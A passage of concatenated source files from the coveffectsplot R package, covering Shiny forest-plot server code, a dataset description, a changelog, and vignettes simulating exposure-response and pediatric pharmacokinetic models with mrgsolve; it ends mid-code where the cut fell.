choices <- as.character(unique(df[["label"]]))
updateSelectizeInput(session, "covvalueorder",
choices = choices, selected = choices)
})
formatstats <- metaReactive2({
shiny::req(maindata())
validate(need(
length(input$covariates) >= 1,
"Please select a least one covariate or All"
))
validate(need(
length(input$covvalueorder) >= 1,
"Please select a least one covariate/All level"
))
df <- maindata()
metaExpr({
df$covname <- factor(df$covname)
df$label <- factor(df$label)
df$exposurename <- df$paramname
sigdigits <- ..(input$sigdigits)
summarydata <- df %>%
group_by(paramname, covname, label) %>%
mutate(
MEANEXP = mid,
LOWCI = lower,
UPCI = upper,
MEANLABEL = signif_pad(MEANEXP, sigdigits),
LOWCILABEL = signif_pad(LOWCI, sigdigits),
UPCILABEL = signif_pad(UPCI, sigdigits),
LABEL = paste0(MEANLABEL, " [", LOWCILABEL, "-", UPCILABEL, "]")
)
summarydata$covvalue <- factor(summarydata$label)
summarydata <- summarydata %>%
filter(covname %in% c(..(input$covariates))) %>%
filter(paramname %in% ..(input$exposurevariables))
summarydata <- as.data.frame(summarydata)
summarydata
})
})
output$refarea <- renderUI({
REF <- ifelse(is.na(input$refvalue),1,input$refvalue)
ymin <- 0.8
ymax <- 1.25
ymaxmax <- REF * ymax *3
ystep <- 0.05
sliderInput(
"refareain",
"Reference Area",
min = 0,
max = ymaxmax,
value = c(ymin, ymax),
step = ystep,
animate = FALSE
)
})
outputOptions(output, "refarea", suspendWhenHidden=FALSE)
observeEvent(input$colourpointrangereset, {
shinyjs::reset("colourpointrange")
})
observeEvent(input$colourbsvrangereset, {
shinyjs::reset("colourbsvrange")
})
observeEvent(input$stripbackfillreset, {
shinyjs::reset("stripbackgroundfill")
})
observeEvent(input$fillrefareareset, {
shinyjs::reset("fillrefarea")
})
observeEvent(input$colorrefvaluereset, {
shinyjs::reset("colorrefvalue")
})
plotdataprepare <- metaReactive2({
shiny::req(formatstats())
metaExpr({
summarydata <- ..(formatstats())
summarydata [, "covname"] <-
factor(summarydata [, "covname"], levels = c(..(input$covariates)))
summarydata [, "label"] <-
factor(summarydata[, "label"] , levels = c(..(input$covvalueorder)))
summarydata <- summarydata %>%
filter(label %in% c(..(input$covvalueorder)))
summarydata [, "paramname"] <-
factor(summarydata[, "paramname"] , levels = c(..(input$exposurevariables)))
summarydata
})
})
output$plot <- metaRender2(renderPlot, {
shiny::req(plotdataprepare())
major_x_ticks <- NULL
minor_x_ticks <- NULL
if (input$customxticks) {
tryCatch({
major_x_ticks <- as.numeric(unique(unlist(strsplit(input$xaxisbreaks, ",")[[1]])))
}, warning = function(w) {}, error = function(e) {})
tryCatch({
minor_x_ticks <- as.numeric(unique(unlist(strsplit(input$xaxisminorbreaks, ",")[[1]])))
}, warning = function(w) {}, error = function(e) {})
}
x_range <- if (input$userxzoom) c(input$lowerxin, input$upperxin) else NULL
ref_value <- if (is.na(input$refvalue)) 1 else input$refvalue
metaExpr({
summarydata <- ..(plotdataprepare())
plot <- forest_plot(
data = summarydata,
facet_formula = ..(input$facetformula),
xlabel = ..(input$xaxistitle),
ylabel = ..(input$yaxistitle),
x_facet_text_size = ..(input$facettextx),
y_facet_text_size = ..(input$facettexty),
x_facet_text_angle = ..(input$facettextxangle),
y_facet_text_angle = ..(input$facettextyangle),
x_facet_text_vjust = ..(input$x_facet_text_vjust),
y_facet_text_vjust = ..(input$y_facet_text_vjust),
x_facet_text_hjust = ..(input$x_facet_text_hjust),
y_facet_text_hjust = ..(input$y_facet_text_hjust),
xy_facet_text_bold = ..(input$boldfacettext),
x_label_text_size = ..(input$xlablesize),
y_label_text_size = ..(input$ylablesize),
table_text_size = ..(input$tabletextsize),
base_size = ..(input$base_size),
theme_benrich = ..(input$theme_benrich),
table_title = escape_newline(..(input$custom_table_title)),
table_title_size = ..(input$table_title_size),
ref_legend_text = escape_newline(..(input$customlinetypetitle)),
area_legend_text = escape_newline(..(input$customfilltitle)),
interval_legend_text = escape_newline(..(input$customcolourtitle)),
interval_bsv_text = escape_newline(..(input$custombsvtitle)),
legend_order = ..(input$legendordering),
combine_area_ref_legend = ..(input$combineareareflegend),
legend_position = ..(input$legendposition),
show_ref_area = ..(input$showrefarea),
ref_area = ..(input$refareain),
show_ref_value = ..(input$showrefvalue),
ref_value = ..(ref_value),
ref_area_col = ..(input$fillrefarea),
ref_value_col = ..(input$colorrefvalue),
interval_col = ..(input$colourpointrange),
bsv_col = ..(input$colourbsvrange),
strip_col = ..(input$stripbackgroundfill),
paramname_shape = ..(input$shapebyparamname),
legend_shape_reverse = ..(input$legendshapereverse),
facet_switch = ..(input$facetswitch),
facet_scales = ..(input$facetscales),
facet_space = ..(input$facetspace),
strip_placement = ..(input$stripplacement),
strip_outline = ..(input$removestrip),
facet_spacing = ..(input$panelspacing),
major_x_ticks = ..(major_x_ticks),
minor_x_ticks = ..(minor_x_ticks),
x_range = ..(x_range),
logxscale = ..(input$logxscale),
show_yaxis_gridlines = ..(input$showyaxisgridlines),
show_xaxis_gridlines = ..(input$showxaxisgridlines),
show_table_facet_strip = ..(input$showtablefacetstrips),
table_facet_switch = ..(input$tablefacetswitch),
show_table_yaxis_tick_label = ..(input$showtableyaxisticklabel),
table_panel_border = ..(input$tablepanelborder),
reserve_table_xaxis_label_space = ..(input$reservetablexaxislabelspace),
table_position = ..(input$tableposition),
plot_table_ratio = ..(input$plottotableratio),
vertical_dodge_height = ..(input$vdodgeheight),
legend_space_x_mult = ..(input$legendspacex),
legend_ncol_interval = ..(input$ncolinterval),
legend_ncol_shape = ..(input$ncolshape),
plot_margin = c(..(input$margintop),..(input$marginright),
..(input$marginbottom),..(input$marginleft)),
table_margin = c(..(input$tabletop),..(input$tableright),
..(input$tablebottom),..(input$tableleft)),
legend_margin = c(..(input$legendtop),..(input$legendright),
..(input$legendbottom),..(input$legendleft)),
parse_xlabel = ..(input$parsexaxistitle),
parse_ylabel = ..(input$parseyaxistitle)
)
plot
})
}, height = function() {
input$height
})
observeEvent(input$get_code, {
if (system.file(package = "shinyAce") == "") {
stop("Please install.packages('shinyAce') and try again.")
}
if (system.file(package = "formatR") == "") {
stop("Please install.packages('formatR') and try again.")
}
code <- expandChain(
"# This code assumes you have a data file named `forest_plot_data.csv`.",
"# You can download this file using the Download button below.",
"#",
"# ------",
"#",
quote({
"# Load required packages"
library(coveffectsplot)
library(dplyr)
library(table1)
"# Load the data (make sure `forest_plot_data.csv` is in your working directory)"
df <- read.csv("forest_plot_data.csv", na.strings = c("NA", "."))
"# Helper functions"
escape_newline <- function(s) {
gsub("\\\\n", "\\\n", s)
}
}),
"# Manipulate data and plot",
output$plot()
)
code <- formatCode(code)
code <- formatR::tidy_source(text = code, width.cutoff = 80, indent = 2)
code <- code$text.tidy
code <- paste(code, collapse = "\n")
showModal(modalDialog(
size = "l", easyClose = TRUE,
shinyAce::aceEditor(
"code_editor", value = code, wordWrap = TRUE
),
footer = tagList(
actionButton("code_copy", "Copy to Clipboard", icon("copy")),
downloadButton("code_download_data", "Download data file"),
modalButton("Dismiss")
)
))
})
observeEvent(input$code_copy, {
if (system.file(package = "clipr") == "") {
stop("Please install.packages('clipr') and try again.")
}
clipr::write_clip(input$code_editor, object_type = "character")
})
output$code_download_data <- downloadHandler(
filename = "forest_plot_data.csv",
content = function(file) {
write.csv(maindata(), file, row.names = FALSE)
}
)
}
<file_sep>/R/data.R
#' Prezista Drug Label Data
#'
#' A dataset containing an excerpt from the official Prezista FDA Drug Label
#' to help in the app exploration.
#'
#' @format A dataset with 33 rows and 6 variables
#' \describe{
#' \item{covname}{Covariate Name, a character variable with two values
#' Protease Inhibitors and Other Antiretrovirals}
#' \item{label}{Covariate value label, a character variable with several possible values}
#' \item{paramname}{Parameter on which the effects are shown,
#' a character variable with three possible values
#' Cmax, AUC and Cmin}
#' \item{mid}{Middle value for the effects, the median from the uncertainty distribution}
#' \item{lower}{Lower value for the effects usually the 5\% from the uncertainty distribution}
#' \item{upper}{Upper value for the effects usually the 95\% from the uncertainty distribution}
#' }
#' @source Table 15 from \url{https://aidsinfo.nih.gov/drugs/397/darunavir/28/professional/}
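#' @examples
#' # Quick illustrative look at the bundled dataset
#' head(prezista)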
"prezista"
<file_sep>/NEWS.md
# coveffectsplot 1.0.0.9999
* Added back code generation in the app (contributed by <NAME>)
* bumped the version to 1.0 to correspond with the tutorial paper
* added back pk and pkpd vignettes after fixing R 4.0 issues
# coveffectsplot 0.0.9
* ui improvements and controls for the new arguments
* added `x/y_facet_text_vjust/hjust` arguments for the facets x/y text hjust/vjust
* added `xy_facet_text_bold` argument to control facets text face
* added `facet_spacing` argument to control facets spacing
* added `facet_labeller` argument (function only not in the shiny app)
* added `strip_outline` argument to allow the removal of strip.background
* added `show_yaxis_gridlines` and `show_xaxis_gridlines` arguments to be able to remove axes grid lines
* added `show_ref_value` and `ref_value_col` arguments for better controls on the ref line
* added `plot_margin` argument (controls plot margins)
* added `table_margin` argument (controls table margins)
* added `legend_margin` argument (controls legend margins)
* added `parse_xlabel` and `parse_ylabel` arguments to parse `xlabel`, `ylabel`
* added `table_panel_border` argument to allow the removal of panel.border of the table plot
* added `reserve_table_xaxis_label_space` argument to allow alignment of switched strips
* added `legend_position` argument to control the legend position
* added `legend_ncol_interval` argument to control number of columns of the interval legend
* added `legend_ncol_shape` argument to control number of columns of the shape legend
* added vignette on pediatric multivariate covariate simulations and removed the pk and pkpd ones
# coveffectsplot 0.0.5
* added an option to have different color and text for BSV (issue submitted by professor <NAME>)
* added two vignettes showing how to simulate PK, PK/PD and exposure-response models from scratch.
* added an argument to control theme_bw: `base_size`
* added theming proposed by <NAME> and arguments to add a table title and size.
* added an argument to ensure alignment of strips between table and plot.
* changed default rounding and padding for table numbers (proposed by <NAME>)
* added options to control the legends number of columns.
* added hooks for more control on margins, strips etc.
# coveffectsplot 0.0.4
* added an option to have a log x axis
* added more control on the table strips
# coveffectsplot 0.0.3
* added an option to return a list of plots to enable further modification to the ggplot(s) if need be
* updated the vignette and examples to demo the new options
* added possibility to choose on which facet to show strips for the table
* fixed a bug that showed up with ggplot dev version by explicitly defining a data.frame to the data argument
* minor ui tweaks to enable named colors in colourpicker
# coveffectsplot 0.0.2
* Removed reference to the old name of the package
* updated vignette and docs
* tweaked the order of the shape legends to reverse
* modified default height of vertical dodging and added an option
* added an option to control legend item x spacing
# coveffectsplot 0.0.1
* Initial Release of coveffectsplot
<file_sep>/vignettes/Exposure_Response_Example.Rmd
---
title: "Exposure-Response Model Assessing the Impact of Covariates on Probabilities of Clinical Outcome"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{Exposure_Response_Example}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
message =FALSE,
warning =FALSE,
fig.width = 7,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(ggplot2)
library(dplyr)
library(tidyr)
library(mrgsolve)
library(ggridges)
library(ggstance)
library(Rcpp)
theme_set(theme_bw())
nsim <- 100 # kept low so the vignette runs faster; otherwise increase to 1000
#utility function to simulate varying one covariate at a time keeping the rest at the reference
expand.modelframe <- function(..., rv, covcol="covname") {
args <- list(...)
df <- lapply(args, function(x) x[[1]])
df[names(rv)] <- rv
res <- lapply(seq_along(rv), function(i) {
df[[covcol]] <- names(rv)[i]
df[[names(rv)[i]]] <- args[[names(rv)[i]]]
as.data.frame(df)
})
do.call(rbind, res)
}
expit <- function(x) exp(x)/ (1 + exp(x) )
```
## Specifying an Exposure-Response Model using `mrgsolve`
Here we illustrate the approach using a binary response linked to exposure (AUC) via a saturating Emax function. Weight is a covariate on Clearance. We also have a categorical disease-severity covariate on EMAX, where patients with severe disease have a lower EMAX.
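Before simulating, a minimal sketch of the logistic link using the `expit` helper defined in the setup chunk (parameter values taken from the annotations below):
```{r logitsketch, collapse=TRUE}
# With baseline probability 0.1 the intercept is log(0.1/0.9); at AUC = AUC50
# the drug adds half of EMAX (5/2 = 2.5) on the log-odds scale.
intercept <- log(0.1 / (1 - 0.1))
expit(intercept + 5 * 7.5 / (7.5 + 7.5))
```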
```{r exprespmodel, collapse=TRUE }
exprespmodel <- '
$PLUGIN Rcpp
$PARAM @annotated
TVCL : 10 : Clearance CL (L/h)
WTCL : 0.75: Weight on CL (ref. 70 kg)
TVEMAX : 5 : Maximum Drug Effect
SEVEMAX : 3 : Severity Reduction of Drug Effect
AUC50 : 7.5 : Area Under the Curve providing half maximal response
BASEP : 0.1 : Baseline Probability of Response
$PARAM @annotated // reference values for covariate
WT : 70 : Weight (kg)
SEV : 0 : Sex (0=Female, 1=Male)
DOSE : 75 : Dose (mg)
$OMEGA @annotated @block
nCL :0.09 : ETA on CL
$PRED
double CL = TVCL *
pow((WT/70.0), WTCL)*exp(ETA(1));
double EMAX = TVEMAX - SEVEMAX*(SEV == 1) ;
double Intercept = log(BASEP/(1-BASEP));
capture CLi = CL;
capture AUC = DOSE/CL;
capture LGST = Intercept + (EMAX*AUC/(AUC50+AUC));
capture P1 = 1/(1+exp(-LGST));
capture DV = R::runif(0,1)< P1 ? 1 : 0;
'
# the typical probability from the model parameters will be :
TypicalProb<- 1/(1+exp(-(log(0.1/(1-0.1)) + (5*75/10/(7.5+75/10)))))
MaxProb<- 1/(1+exp(-(log(0.1/(1-0.1)) + (5*750/10/(7.5+750/10)))))
MinProb<- 1/(1+exp(-(log(0.1/(1-0.1)) + (5*0/10/(7.5+0/10)))))
modexprespsim <- mcode("exprespmodel", exprespmodel)
simdata <- expand.idata(SEV=c(0),
DOSE = c(0,75),
ID = 1:1000) %>%
  dplyr::mutate(WT = 70) # alternatively: exp(rnorm(n(), log(70), 0.3))
set.seed(466548)
simout <- modexprespsim %>%
data_set(simdata) %>%
carry.out(WT, DOSE, SEV) %>%
mrgsim()%>%
as.data.frame
```
## Probability of Cure
This is a plot of the probability of the disease being cured versus PK exposure (AUC), by disease severity and by weight.
```{r exprespmodeplotl, collapse=TRUE }
WT_names <- c(
'70'="Weight: 70 kg"
)
SEV_names <- c(
'0'="Severity: 0 (Not Severe)"
)
probplot<- ggplot(simout, aes(AUC,DV,linetype=factor(SEV))) +
facet_grid( WT~SEV,labeller=labeller(WT=WT_names,SEV=SEV_names))+
geom_point(position=position_jitter(height=0.02,width=0.1),
aes(color=factor(DOSE)),size=1,alpha=0.5)+
geom_line(aes(y=P1),color="black",size=1.1)+
geom_label(data=data.frame(
x=9,y=TypicalProb,label=paste(round(100*TypicalProb,1),"%"),SEV=0),
aes(x=x,y=y,label=label),fill="transparent")+
geom_label(data=data.frame(
x=0.37,y=0.1,label=paste(round(100*0.1,1),"%"),SEV=0),
aes(x=x,y=y,label=label),fill="transparent")+
labs(color="Dose (mg)",y="Probability of Response",
linetype="Severity")+
theme_bw() +
theme(legend.position = "top")
probplot
```
```{r bsvrangeplot, collapse=TRUE }
simoutbsvplacebo <- simout %>%
filter(DOSE==0)%>%
mutate(LGST =LGST)%>%
gather(paramname, paramvalue,LGST,P1)%>%
group_by(paramname)%>%
summarize(P50 = quantile(paramvalue, 0.5)
)
simoutbsv <- simout %>%
mutate(logodds =LGST)%>%
filter(DOSE==75)
# the probability of response at the typical AUC
simoutbsvlong <- simoutbsv %>%
mutate(P1std=P1/TypicalProb) %>%
gather(paramname, paramvalue,P1std,P1)
yvar_names <- c(
'P1std'="Standardized Probability",
'P1'="Probability"
)
pbsvranges<- ggplot(simoutbsvlong, aes(
x = paramvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_wrap(paramname~. , scales="free", ncol=1,
labeller=labeller(paramname=yvar_names) ) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="Probability",
values=c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
pbsvranges
simoutbsvranges <- simoutbsvlong %>%
group_by(paramname)%>%
summarize(
P05 = quantile(paramvalue, 0.05),
P25 = quantile(paramvalue, 0.25),
P50 = quantile(paramvalue, 0.5),
P75 = quantile(paramvalue, 0.75),
P95 = quantile(paramvalue, 0.95))
simoutbsvranges
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# probplot <- probplot +theme_bw(base_size=18)+
# theme(legend.position = "top")
# pbsvranges <- pbsvranges+theme_bw(base_size=22)+
# theme(
# legend.position = "none",
# axis.text.y = element_blank(),
# axis.ticks.y = element_blank(),
# axis.title.y = element_blank())
# ggsave(plot = egg::ggarrange(probplot , pbsvranges,ncol=2),
# "Figure_8_1.png", device="png",type="cairo-png",width = 10, height = 5)
```
## Computing the Odds and Probabilities
Here we show how the odds and probabilities can be computed. We already know that the distribution of AUC depends on the dose and on the distribution of clearance. The model has five parameters shown in <span style="color: red;">red</span>; the dose, disease severity and weight are covariates and are shown in <span style="color: green;">green</span>. A change in body weight triggers a change in Clearance, which in turn controls the AUC. To define an odds ratio we need the reference odds at the reference covariate values (Severity = 0) and the odds at changed covariate values, for example Severity = 1, everything else being equal. For nonlinear relationships, in addition to the size of the covariate change (e.g. a 25 mg change in dose), it is important to define the reference value we are changing from: a change from placebo (0 mg) to 25 mg is not the same as increasing the typical dose of 75 mg to 100 mg.
The relevant model equations are:
$$AUC = \frac { \color{green}{Dose}} {\color{red}{CL} \times \left( \frac { \color{green}{Weight}} {70}\right)^{WTCL} \times \exp(\eta_{CL}) }$$
$$E_{max}= \color{red}{TVE_{max}} - \color{red}{SevE_{max}}\times\left(\color{green}{Severity} = 1\right) $$
$$log(odds) = \color{red}{intercept} + \left( \frac {E_{max} \times \color{blue}{AUC}} {\color{red}{AUC_{50}} +\color{blue}{AUC} }\right)$$
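As a worked example of an odds ratio implied by these equations (a sketch using the typical parameter values, with no variability or uncertainty): severe disease lowers EMAX from 5 to 2, so at the reference AUC of 7.5 (75 mg / CL of 10) the log-odds drop by 1.5 and the odds ratio is exp(-1.5).
```{r orsketch, collapse=TRUE}
auc <- 75 / 10 # reference AUC
# Odds ratio for Severity = 1 vs 0 at this AUC: exp(difference in log-odds)
exp((2 - 5) * auc / (7.5 + auc))
```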
```{r, collapse=TRUE }
set.seed(678549)
thmeans <- c(10,0.75, #TVCL WTCL
5,3, # TVEMAX SEVEMAX
7.5, # AUC50
0.1) #BASEP
thvariances<- (thmeans*0.15)^2
thecorrelations <- matrix(ncol=length(thmeans),nrow=length(thmeans))
diag(thecorrelations)<- 1
thecorrelations[lower.tri(thecorrelations, diag = FALSE)]<- 0.2
thecorrelations[upper.tri(thecorrelations, diag = FALSE)]<- 0.2
thevarcovmatrix<- diag(sqrt(thvariances))%*%thecorrelations%*%diag(sqrt(thvariances))
sim_parameters <- MASS::mvrnorm(n = nsim, mu=as.numeric(thmeans),
Sigma=thevarcovmatrix, empirical = TRUE)
colnames(sim_parameters) <- colnames(thevarcovmatrix) <- c("TVCL","WTCL",
"TVEMAX","SEVEMAX","AUC50",
"BASEP")
sim_parameters<- as.data.frame(sim_parameters)
reference.values <- data.frame(WT = 70, DOSE = 75, SEV = 0 )
covcomb <- expand.modelframe(
WT = c(50,60,70,80,90),
DOSE = c(0,25,50,75,100,125,150),
SEV = c(0,1),
rv = reference.values)
covcomb <- covcomb[!duplicated(
paste(covcomb$WT,covcomb$WT,covcomb$DOSE,covcomb$SEV)),]
covcomb$ID <- 1:nrow(covcomb)
iter_sims <- NULL
for(i in 1:nsim) {
idata <- as.data.frame(covcomb)
idata$covname<- NULL
data.all <- idata
data.all$TVCL <- as.numeric(sim_parameters[i,1])
data.all$WTCL <- as.numeric(sim_parameters[i,2])
data.all$TVEMAX <- as.numeric(sim_parameters[i,3])
data.all$SEVEMAX <- as.numeric(sim_parameters[i,4])
data.all$AUC50 <- as.numeric(sim_parameters[i,5])
data.all$BASEP <- as.numeric(sim_parameters[i,6])
out <- modexprespsim %>%
data_set(data.all) %>%
carry.out(CL,WT, DOSE, SEV, AUC) %>%
zero_re() %>%
mrgsim()
dfsimunc <- as.data.frame(out%>% mutate(rep = i) )
iter_sims <- rbind(iter_sims,dfsimunc)
}
```
```{r, collapse=TRUE }
stdprobplot<- ggplot(iter_sims, aes(DOSE,P1,col=factor(SEV) ) )+
geom_point(aes(group=interaction(ID,rep)),alpha=0.5,size=3)+
geom_hline(yintercept=TypicalProb)+
facet_grid(SEV~ WT,labeller = label_both)+
labs(y="Probability of Response", colour="Severity")
stdprobplot
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# stdprobplot<- stdprobplot+
# theme(axis.title.y = element_text(size=15),
# legend.position = c(0.8,0.2))+
# scale_y_continuous( sec.axis = sec_axis(~ . /TypicalProb,
# name = "Standardized Probability"))
# stdprobplot
# ggsave("Figure_8_2.png", device="png",type="cairo-png",
# width = 7, height = 4)
```
```{r, fig.height= 7, collapse=TRUE }
iter_sims <- iter_sims %>%
mutate(P1std=P1/TypicalProb)%>%
gather(paramname,paramvalue,P1std)%>%
ungroup() %>%
dplyr::mutate( covname = case_when(
ID== 1 ~ "Weight",
ID== 2 ~ "Weight",
ID== 3 ~ "REF",
ID== 4 ~ "Weight",
ID== 5 ~ "Weight",
ID== 6 ~ "DOSE",
ID== 7 ~ "DOSE",
ID== 8 ~ "DOSE",
ID== 9 ~ "DOSE",
ID== 10 ~ "DOSE",
ID== 11 ~ "DOSE",
ID== 12 ~ "SEV"
),
covvalue =case_when(
ID== 1 ~ paste(WT,"kg"),
ID== 2 ~ paste(WT,"kg"),
ID== 3 ~ "70 kg\nNot Severe\n75 mg",
ID== 4 ~ paste(WT,"kg"),
ID== 5 ~ paste(WT,"kg"),
ID== 6 ~ paste(DOSE,"mg"),
ID== 7 ~ paste(DOSE,"mg"),
ID== 8 ~ paste(DOSE,"mg"),
ID== 9 ~ paste(DOSE,"mg"),
ID== 10 ~ paste(DOSE,"mg"),
ID== 11 ~ paste(DOSE,"mg"),
ID== 12 ~ "Severe"
) )
iter_sims$covname <-factor(as.factor(iter_sims$covname ),
levels = c("Weight","DOSE","SEV","REF"))
iter_sims$covvalue <- factor(as.factor(iter_sims$covvalue),
levels = c("0 mg","25 mg","50 mg",
"100 mg","125 mg","150 mg",
"50 kg","60 kg","80 kg", "90 kg",
"70 kg\nNot Severe\n75 mg", "Severe"))
ggplot(iter_sims,aes(x=paramvalue,y=covvalue))+
stat_density_ridges(aes(fill=factor(..quantile..),height=..ndensity..),
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.001,scale=0.9,
quantiles = c(0.025,0.5, 0.975))+
facet_grid(covname~paramname,scales="free",switch="both",
labeller = labeller(paramname=yvar_names))+
scale_fill_manual(
name = "Probability", values = c("white","#0000FFA0", "#0000FFA0","white"),
labels = c("(0, 0.025]","(0.025, 0.5]","(0.5, 0.975]","(0.975, 1]")
)+
theme_bw()+
theme(axis.title = element_blank(),strip.placement = "outside")
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# last_plot()+theme_bw(base_size = 16)+
# theme(legend.position = "none",
# axis.title = element_blank(),strip.placement = "outside")
# ggsave("Figure_8_3.png", device="png",type="cairo-png",
# width= 7, height = 6,dpi=72)
```
```{r plot3, collapse=TRUE }
coveffectsdatacovrep <- iter_sims %>%
dplyr::group_by(paramname,ID,WT,DOSE,SEV,covname,covvalue) %>%
dplyr::summarize(
mid= median(paramvalue),
lower= quantile(paramvalue,0.025),
upper = quantile(paramvalue,0.975))%>%
dplyr::filter(!is.na(mid))
simoutbsvranges<-simoutbsvranges[simoutbsvranges$paramname=="P1std",]
coveffectsdatacovrepbsv <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv$covname <- "BSV"
coveffectsdatacovrepbsv$covvalue <- "90% of patients"
coveffectsdatacovrepbsv$label <- "90% of patients"
coveffectsdatacovrepbsv$lower <- simoutbsvranges$P05
coveffectsdatacovrepbsv$upper <- simoutbsvranges$P95
coveffectsdatacovrepbsv2 <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv2$covname <- "BSV"
coveffectsdatacovrepbsv2$covvalue <- "50% of patients"
coveffectsdatacovrepbsv2$label <- "50% of patients"
coveffectsdatacovrepbsv2$lower <- simoutbsvranges$P25
coveffectsdatacovrepbsv2$upper <- simoutbsvranges$P75
coveffectsdatacovrepbsv<- rbind(coveffectsdatacovrep,coveffectsdatacovrepbsv2,
coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv <- coveffectsdatacovrepbsv %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
coveffectsdatacovrepbsv<- as.data.frame(coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv$label <-factor(as.factor(coveffectsdatacovrepbsv$label ),
levels = c("All Subjects","90% of patients","50% of patients",
"50 kg","60 kg","80 kg","90 kg",
"0 mg","25 mg","50 mg","100 mg","125 mg","150 mg",
"Severe","70 kg\nNot Severe\n75 mg"
))
coveffectsdatacovrepbsv$covname <-factor(as.factor(coveffectsdatacovrepbsv$covname ),
levels = c("Weight","DOSE","SEV","REF","BSV"))
ref_legend_text <- "Reference (vertical line)"
png("./Figure_8_4.png",width =9 ,height = 7,units = "in",res=72)
forest_plot(coveffectsdatacovrepbsv,
strip_placement = "outside",
show_ref_area = FALSE,
show_ref_value=TRUE,
ref_legend_text = ref_legend_text,
plot_table_ratio = 2,
base_size = 12,
table_text_size = 4,
y_label_text_size = 12,
xlabel= " ",
facet_formula = "covname~paramname",
facet_labeller = labeller(paramname=yvar_names),
facet_scales = "free",
logxscale = TRUE,
major_x_ticks = c(0.1,0.25, 0.5,1,1.5),
x_range = c(0.1, 1.5))
dev.off()
```

<file_sep>/data-raw/prezista.R
usethis::use_data_raw()
prezista <- readr::read_csv("./data-raw/druglabel.csv")
usethis::use_data(prezista, overwrite = TRUE)<file_sep>/vignettes/Pediatric_Cov_Sim.Rmd
---
title: "PK Model in Pediatric Patients: Assessing the Impact of a Multivariate Correlated Distribution of Covariates on PK Exposures"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{Pediatric_Cov_Sim}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
In this vignette we illustrate how to study the effects of covariates in a pediatric population between 2 and 6 years old. Since Age and Weight in kids are highly correlated, we will not simulate varying one covariate at a time; rather, we will incorporate a **distribution** of realistic Age/Weight pairs.
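A toy sketch of why this matters (the correlation and variances below are illustrative assumptions, not the NHANES values): sampling one covariate at a time ignores the correlation and produces Age/Weight pairs that do not occur in children, whereas sampling from a joint distribution keeps the pairs realistic.
```{r corrsketch, collapse=TRUE}
set.seed(42)
# Bivariate normal Age/Weight pairs with an assumed correlation of 0.8
aw <- MASS::mvrnorm(5, mu = c(4, 16),
                    Sigma = matrix(c(1, 2.4, 2.4, 9), nrow = 2))
colnames(aw) <- c("AGE", "WT")
aw
```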
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
message =FALSE,
warning =FALSE,
fig.width = 7,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(gamlss.dist)
library(tidyr)
library(dplyr)
library(ggplot2)
library(mrgsolve)
library(ggridges)
library(table1)
library(data.table)
theme_set(theme_bw())
nsubj <- 1000
```
## Specifying a Pediatric Simulation Model
Here we have a simple one-compartment PK model with first-order absorption where clearance and volume are allometrically scaled. The reference subject is a 4-year-old female with a weight of 15.8 kg.
* First, we plot a typical PK profile with between-subject variability (BSV).
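For orientation, a one-line sketch of what the allometric scaling in the model below implies: a 10 kg child would have a typical clearance of 4 × (10/15.8)^0.75 L/h.
```{r allosketch, collapse=TRUE}
4 * (10 / 15.8)^0.75 # typical CL (L/h) for a 10 kg child, ref. 15.8 kg
```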
```{r pedpkmodel, collapse=TRUE }
pedpkmodelcov <- '
$PARAM @annotated
KA : 0.5 : Absorption rate constant Ka (1/h)
CL : 4 : Clearance CL (L/h)
V : 10 : Central volume Vc (L)
CLWT : 0.75 : Weight on CL (ref. 15.8 kg)
VWT : 1 : Weight on V (ref. 15.8 kg)
$PARAM @annotated // reference values for covariate
WT : 15.8 : Weight (kg)
SEX : 0 : Sex (0=Female, 1=Male)
AGE : 4 : Age (years)
$CMT GUT CENT
$MAIN
double CLi = CL *
pow((WT/15.8), CLWT)*exp(ETA(1));
double Vi = V *
pow((WT/15.8), VWT)*exp(ETA(2));
double KAi = KA;
double Keli = CLi/Vi;
$OMEGA
0.09
0.01 0.09
$ODE
dxdt_GUT = -KAi*GUT;
dxdt_CENT = KAi*GUT-Keli*CENT;
$TABLE
double CP = CENT/ Vi;
$CAPTURE CP KAi CLi Vi WT SEX AGE
'
pedmodsim <- mcode("pedpkmodelcov", pedpkmodelcov)
partab <- setDT(pedmodsim@annot$data)[block=="PARAM", .(name, descr, unit)]
partab <- merge(partab, melt(setDT(pedmodsim@param@data), meas=patterns("*"), var="name"))
knitr::kable(partab)
idata <- data.table(
ID = 1:nsubj,
WT = c(rep(15.8,nsubj/2),
         rep(16.2,nsubj/2)), # NHANES median weights at 4 years (girls, boys)
AGE = 4,
SEX = c(rep(0,nsubj/2),rep(1,nsubj/2))
